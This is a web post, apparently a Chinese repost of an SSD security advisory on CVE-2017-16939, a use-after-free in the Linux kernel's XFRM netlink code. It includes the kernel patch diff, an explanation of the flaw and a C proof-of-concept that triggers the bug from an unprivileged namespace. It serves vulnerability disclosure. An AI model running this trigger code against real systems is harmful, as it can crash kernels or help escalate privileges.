{"id":10805,"date":"2017-12-11T14:19:08","date_gmt":"2017-12-11T22:19:08","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/12\/11\/news-4577\/"},"modified":"2017-12-11T14:19:08","modified_gmt":"2017-12-11T22:19:08","slug":"news-4577","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/12\/11\/news-4577\/","title":{"rendered":"SSD\u5b89\u5168\u516c\u544a-Linux\u5185\u6838XFRM\u6743\u9650\u63d0\u5347\u6f0f\u6d1e"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 11 Dec 2017 08:51:42 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3563\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3563');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>\u6f0f\u6d1e\u6982\u8981<\/strong><br \/> \u4ee5\u4e0b\u5b89\u5168\u516c\u544a\u63cf\u8ff0\u4e86\u5728Linux\u5185\u6838\u4e2d\u53d1\u73b0\u7684\u4e00\u4e2aUAF\u6f0f\u6d1e\uff0c\u6210\u529f\u5229\u7528\u6b64\u6f0f\u6d1e\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u63d0\u5347\u6743\u9650\u3002\u6f0f\u6d1e\u5b58\u5728\u4e8eNetlink \u5957\u63a5\u5b57\u5b50\u7cfb\u7edf \u2013 XFRM.<\/p>\n<p>Netlink\u7528\u4e8e\u5728\u5185\u6838\u548c\u7528\u6237\u7a7a\u95f4\u8fdb\u7a0b\u4e4b\u95f4\u4f20\u8f93\u4fe1\u606f\u3002 
\u5b83\u7531\u7528\u6237\u7a7a\u95f4\u8fdb\u7a0b\u7684\u6807\u51c6\u57fa\u4e8e\u5957\u63a5\u5b57\u7684\u63a5\u53e3\u548c\u5185\u6838\u6a21\u5757\u7684\u5185\u90e8\u5185\u6838API\u7ec4\u6210\u3002<\/p>\n<p><strong>\u6f0f\u6d1e\u63d0\u4ea4\u8005<\/strong><\/p>\n<p>\u4e00\u4f4d\u72ec\u7acb\u7684\u5b89\u5168\u7814\u7a76\u5458Mohamed Ghannam\u5411Beyond Security\u7684SSD\u62a5\u544a\u4e86\u8be5\u6f0f\u6d1e<\/p>\n<p><strong>\u5382\u5546\u54cd\u5e94<\/strong><\/p>\n<p>\u8be5\u6f0f\u6d1e\u5df2\u5728\u8865\u4e011137b5e\u4e2d\u88ab\u4fee\u590d\uff08\u201cipsec\uff1a\u4fee\u590d\u4e2d\u6b62xfrm\u7b56\u7565\u8f6c\u50a8\u5d29\u6e83\u201d\uff09<\/p>\n<p>CVE: CVE-2017-16939<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a2f045be6348189898138\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div 
class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">  
@@ -1693,32 +1693,34 @@ static int dump_one_policy(struct xfrm_policy *xp, int dir, int count, void *ptr     static int xfrm_dump_policy_done(struct netlink_callback *cb)   {  &#8211;\tstruct xfrm_policy_walk *walk = (struct xfrm_policy_walk *) &amp;cb-&gt;args[1];  +\tstruct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb-&gt;args;   \tstruct net *net = sock_net(cb-&gt;skb-&gt;sk);      \txfrm_policy_walk_done(walk, net);   \treturn 0;   }     +static int xfrm_dump_policy_start(struct netlink_callback *cb)  +{  +\tstruct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb-&gt;args;  +  +\tBUILD_BUG_ON(sizeof(*walk) &gt; sizeof(cb-&gt;args));  +  +\txfrm_policy_walk_init(walk, XFRM_POLICY_TYPE_ANY);  +\treturn 0;  +}  +   static int xfrm_dump_policy(struct sk_buff *skb, struct netlink_callback *cb)   {   \tstruct net *net = sock_net(skb-&gt;sk);  &#8211;\tstruct xfrm_policy_walk *walk = (struct xfrm_policy_walk *) &amp;cb-&gt;args[1];  +\tstruct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb-&gt;args;   \tstruct xfrm_dump_info info;     &#8211;\tBUILD_BUG_ON(sizeof(struct xfrm_policy_walk) &gt;  &#8211;\t\t     sizeof(cb-&gt;args) &#8211; sizeof(cb-&gt;args[0]));  &#8211;   \tinfo.in_skb = cb-&gt;skb;   \tinfo.out_skb = skb;   \tinfo.nlmsg_seq = cb-&gt;nlh-&gt;nlmsg_seq;   \tinfo.nlmsg_flags = NLM_F_MULTI;     &#8211;\tif (!cb-&gt;args[0]) {  &#8211;\t\tcb-&gt;args[0] = 1;  &#8211;\t\txfrm_policy_walk_init(walk, XFRM_POLICY_TYPE_ANY);  &#8211;\t}  &#8211;   \t(void) xfrm_policy_walk(net, walk, dump_one_policy, &amp;info);      \treturn skb-&gt;len;   @@ -2474,6 +2476,7 @@ static const struct nla_policy xfrma_spd_policy[XFRMA_SPD_MAX+1] = {      static const struct xfrm_link {   \tint (*doit)(struct sk_buff *, struct nlmsghdr *, struct nlattr **);  +\tint (*start)(struct netlink_callback *);   \tint (*dump)(struct sk_buff *, struct netlink_callback *);   \tint (*done)(struct netlink_callback *);   \tconst struct nla_policy *nla_pol;   
@@ -2487,6 +2490,7 @@ static const struct xfrm_link {   \t[XFRM_MSG_NEWPOLICY   &#8211; XFRM_MSG_BASE] = { .doit = xfrm_add_policy    },   \t[XFRM_MSG_DELPOLICY   &#8211; XFRM_MSG_BASE] = { .doit = xfrm_get_policy    },   \t[XFRM_MSG_GETPOLICY   &#8211; XFRM_MSG_BASE] = { .doit = xfrm_get_policy,  +\t\t\t\t\t\t   .start = xfrm_dump_policy_start,   \t\t\t\t\t\t   .dump = xfrm_dump_policy,   \t\t\t\t\t\t   .done = xfrm_dump_policy_done },   \t[XFRM_MSG_ALLOCSPI    &#8211; XFRM_MSG_BASE] = { .doit = xfrm_alloc_userspi },   
@@ -2539,6 +2543,7 @@ static int xfrm_user_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh,      \t\t{   \t\t\tstruct netlink_dump_control c = {  +\t\t\t\t.start = link-&gt;start,   \t\t\t\t.dump = link-&gt;dump,   \t\t\t\t.done = link-&gt;done,   \t\t\t};<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0099 seconds] -->  <\/p>\n<p><span id=\"more-3563\"><\/span><\/p>\n<p><strong>\u6f0f\u6d1e\u8be6\u7ec6\u4fe1\u606f<\/strong><\/p>\n<p>\u975e\u7279\u6743\u7528\u6237\u53ef\u4ee5\u66f4\u6539Netlink \u5957\u63a5\u5b57\u5b50\u7cfb\u7edf XFRM sk-> sk_rcvbuf\u7684\u503c\uff08sk ==sock\u7ed3\u6784\u4f53\u5bf9\u8c61\uff09\u3002<\/p>\n<p>\u53ef\u4ee5\u901a\u8fc7setsockopt\uff08SO_RCVBUF\uff09\u66f4\u6539sk-> sk_rcvbuf\u7684\u503c\u4e3a\u7279\u5b9a\u7684\u8303\u56f4\u3002\u901a\u8fc7recvmsg\/recv\/read\u63a5\u6536\u6570\u636e\u65f6\uff0csk_rcvbuf\u8868\u793a\u63a5\u6536\u7f13\u51b2\u533a\u7684\u5927\u5c0f\u3002<\/p>\n<p>sk_rcvbuf\u503c\u662f\u5185\u6838\u4e3askb\uff08sk_buff\u7ed3\u6784\u4f53\u5bf9\u8c61\uff09\u5206\u914d\u7684\u5927\u5c0f\u3002<\/p>\n<p>skb-> trusize\u662f\u4e00\u4e2a\u53d8\u91cf\uff0c\u5b83\u4fdd\u6301\u5bf9\u5df2\u4f7f\u7528\u5185\u5b58\u7684\u8ffd\u8e2a\uff0c\u4e3a\u4e86\u907f\u514d\u5185\u5b58\u6d6a\u8d39\uff0c\u65b9\u4fbf\u7ba1\u7406\uff0c\u5185\u6838\u53ef\u4ee5\u5728\u8fd0\u884c\u65f6\u6539\u53d8skb\u7684\u5927\u5c0f\u3002<\/p>\n<p>\u4f8b\u5982\uff0c\u5982\u679c\u6211\u4eec\u5206\u914d\u4e00\u4e2a\u5927\u7684\u5957\u63a5\u5b57\u7f13\u51b2\u533a\uff08skb\uff09\uff0c\u800c\u6211\u4eec\u53ea\u63a5\u6536\u52301\u5b57\u8282\u5927\u5c0f\u7684\u6570\u636e\u5305\uff0c\u5185\u6838\u5c06\u901a\u8fc7\u8c03\u7528skb_set_owner_r\u6765\u8c03\u6574skb-> trusize\u7684\u5927\u5c0f\u3002<\/p>\n<p>\u901a\u8fc7\u8c03\u7528skb_set_owner_r\u4fee\u6539sk-> sk_rmem_alloc\uff08\u5f15\u7528\u81ea\u539f\u5b50\u53d8\u91cfsk-> sk_backlog.rmem_alloc\uff09\u3002<\/p>\n<p><a 
href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux1.jpg\" data-slb-active=\"1\" data-slb-asset=\"521610148\" data-slb-internal=\"0\" data-slb-group=\"3563\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux1-300x30.jpg\" alt=\"\" width=\"300\" height=\"30\" class=\"alignnone size-medium wp-image-3536\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux1-300x30.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux1-768x76.jpg 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux1-1024x101.jpg 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux1.jpg 1511w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>\u5f53\u521b\u5efaXFRM netlink \u5957\u63a5\u5b57\u65f6\uff0c\u4f1a\u8c03\u7528xfrm_dump_policy\u51fd\u6570\uff0c\u5f53\u6211\u4eec\u5173\u95ed\u5957\u63a5\u5b57\u65f6\uff0cxfrm_dump_policy_done\u4f1a\u88ab\u8c03\u7528\u3002<\/p>\n<p>\u5f53netlink_sock\u5bf9\u8c61\u7684cb_running\u503c\u4e3atrue\u65f6\u8c03\u7528xfrm_dump_policy_done\u3002<\/p>\n<p>xfrm_dump_policy_done\u4f1a\u5c1d\u8bd5\u6e05\u7406\u7531netlink_callback\u5bf9\u8c61\u7ba1\u7406\u7684xfrm walk\u6761\u76ee\u3002<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux2.jpg\" data-slb-active=\"1\" data-slb-asset=\"981765232\" data-slb-internal=\"0\" data-slb-group=\"3563\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux2-300x66.jpg\" alt=\"\" width=\"300\" height=\"66\" class=\"alignnone size-medium wp-image-3537\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux2-300x66.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux2-768x168.jpg 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux2-1024x225.jpg 1024w, 
https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux2.jpg 1527w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>\u5f53\u8c03\u7528netlink_skb_set_owner_r\uff08\u5982skb_set_owner_r\uff09\u65f6\uff0c\u5b83\u4f1a\u66f4\u65b0sk_rmem_alloc\u3002<\/p>\n<p>netlink_dump():<br \/> <a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux3.jpg\" data-slb-active=\"1\" data-slb-asset=\"1556966987\" data-slb-internal=\"0\" data-slb-group=\"3563\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux3-300x25.jpg\" alt=\"\" width=\"300\" height=\"25\" class=\"alignnone size-medium wp-image-3538\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux3-300x25.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux3-768x64.jpg 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux3-1024x86.jpg 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux3.jpg 1517w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>\u5728\u4e0a\u9762\u7684\u4ee3\u7801\u4e2d\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u5230\u5f53sk->sk_rcvbuf\u5c0f\u4e8esk_rmem_alloc\uff08\u6ce8\u610f\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7setsockopt\u63a7\u5236sk->sk_rcvbuf\uff09\u65f6\uff0cnetlink_dump()\u9a8c\u8bc1\u5931\u8d25\u3002<\/p>\n<p>\u5f53\u6ee1\u8db3sk->sk_rcvbuf\u5c0f\u4e8esk_rmem_alloc\u65f6\uff0c\u4f1a\u8df3\u8f6c\u5230\u51fd\u6570\u7684\u7ed3\u5c3e\uff0c\u7136\u800ccb_running\u7684\u503c\u8fd8\u6ca1\u6709\u88ab\u66f4\u6539\u4e3afalse\uff0cnetlink_dump()\u51fd\u6570\u5c31\u8fd4\u56de\u4e86\u3002<\/p>\n<p>\u6b64\u65f6nlk->cb_running\u4e3atrue\uff0c\u56e0\u6b64\u4f1a\u8c03\u7528xfrm_dump_policy_done()\u3002<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux4.jpg\" data-slb-active=\"1\" data-slb-asset=\"1231943600\" data-slb-internal=\"0\"
data-slb-group=\"3563\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux4-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" class=\"alignnone size-medium wp-image-3539\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux4-300x124.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux4-768x318.jpg 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux4-1024x424.jpg 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux4.jpg 1320w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>nlk-> cb.done\u6307\u5411xfrm_dump_policy_done\uff0c\u503c\u5f97\u6ce8\u610f\u7684\u662f\u8fd9\u4e2a\u51fd\u6570\u5904\u7406\u4e00\u4e2a\u53cc\u5411\u94fe\u8868\uff0c\u6240\u4ee5\u5982\u679c\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\u5f15\u7528\u4e00\u4e2a\u53ef\u63a7\u7684\u7f13\u51b2\u533a\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u5b9e\u73b0\u4efb\u610f\u5185\u5b58\u8bfb\u5199\u3002<\/p>\n<p><strong>\u6f0f\u6d1e\u8bc1\u660e<\/strong><br \/> \u4e0b\u9762\u7684\u4ee3\u7801\u5728Ubuntu 17.04\u6d4b\u8bd5\u3002<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a2f045be6354547480509\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div 
class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #define _GNU_SOURCE  #include &lt;string.h&gt;  #include &lt;stdio.h&gt;  #include &lt;stdlib.h&gt;  #include &lt;asm\/types.h&gt;  #include &lt;sys\/socket.h&gt;  #include &lt;netinet\/in.h&gt;  #include &lt;arpa\/inet.h&gt;  #include &lt;linux\/netlink.h&gt;  #include &lt;linux\/xfrm.h&gt;  #include &lt;sched.h&gt;  #include &lt;unistd.h&gt;    #define BUFSIZE 2048      int fd;  struct sockaddr_nl addr;    struct msg_policy {      struct nlmsghdr msg;      char buf[BUFSIZE];  };    void create_nl_socket(void)  {      fd = socket(PF_NETLINK,SOCK_RAW,NETLINK_XFRM);      memset(&amp;addr,0,sizeof(struct sockaddr_nl));      addr.nl_family = AF_NETLINK;      addr.nl_pid = 0; \/* packet goes into the kernel *\/      addr.nl_groups = XFRMNLGRP_NONE; \/* no need for multicast group *\/    }    void do_setsockopt(void)  {      int var =0x100;        setsockopt(fd,1,SO_RCVBUF,&amp;var,sizeof(int));  }    struct msg_policy 
*init_policy_dump(int size)  {      struct msg_policy *r;        r = malloc(sizeof(struct msg_policy));      if(r == NULL) {          perror(&#8220;malloc&#8221;);          exit(-1);      }      memset(r,0,sizeof(struct msg_policy));        r-&gt;msg.nlmsg_len = 0x10;      r-&gt;msg.nlmsg_type = XFRM_MSG_GETPOLICY;      r-&gt;msg.nlmsg_flags = NLM_F_MATCH | NLM_F_MULTI |  NLM_F_REQUEST;      r-&gt;msg.nlmsg_seq = 0x1;      r-&gt;msg.nlmsg_pid = 2;      return r;    }  int send_msg(int fd,struct nlmsghdr *msg)  {      int err;      err = sendto(fd,(void *)msg,msg-&gt;nlmsg_len,0,(struct sockaddr*)&amp;addr,sizeof(struct sockaddr_nl));      if (err &lt; 0) {          perror(&#8220;sendto&#8221;);          return -1;      }      return 0;    }    void create_ns(void)  {  \tif(unshare(CLONE_NEWUSER) != 0) {  \t\tperror(&#8220;unshare(CLONE_NEWUSER)&#8221;);  \t\texit(1);  \t}  \tif(unshare(CLONE_NEWNET) != 0) {  \t\tperror(&#8220;unshared(CLONE_NEWUSER)&#8221;);  \t\texit(2);  \t}  }  int main(int argc,char **argv)  {      struct msg_policy *p;      create_ns();        create_nl_socket();      p = init_policy_dump(100);      do_setsockopt();      send_msg(fd,&amp;p-&gt;msg);      p = init_policy_dump(1000);      send_msg(fd,&amp;p-&gt;msg);      return 0;  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-4\">4<\/div>\n<div class=\"crayon-num\" 
data-line=\"crayon-5a2f045be6354547480509-89\">89<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-92\">92<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-93\">93<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-94\">94<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-95\">95<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-96\">96<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-1\"><span class=\"crayon-p\">#define _GNU_SOURCE<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-2\"><span class=\"crayon-p\">#include &lt;string.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-3\"><span class=\"crayon-p\">#include &lt;stdio.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-4\"><span class=\"crayon-p\">#include &lt;stdlib.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-5\"><span class=\"crayon-p\">#include &lt;asm\/types.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-6\"><span class=\"crayon-p\">#include &lt;sys\/socket.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-7\"><span class=\"crayon-p\">#include &lt;netinet\/in.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-5a2f045be6354547480509-8\"><span class=\"crayon-p\">#include &lt;arpa\/inet.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-9\"><span class=\"crayon-p\">#include &lt;linux\/netlink.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-10\"><span class=\"crayon-p\">#include &lt;linux\/xfrm.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-11\"><span class=\"crayon-p\">#include &lt;sched.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-12\"><span class=\"crayon-p\">#include &lt;unistd.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-14\"><span class=\"crayon-p\">#define BUFSIZE 2048<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-15\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-16\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-17\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-18\"><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sockaddr_nl <\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-19\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-20\"><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">msg_policy<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div 
class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">nlmsghdr <\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">BUFSIZE<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-23\"><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-24\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-25\"><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">create_nl_socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-26\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">PF_NETLINK<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">SOCK_RAW<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">NETLINK_XFRM<\/span><span class=\"crayon-sy\">)<\/span><span 
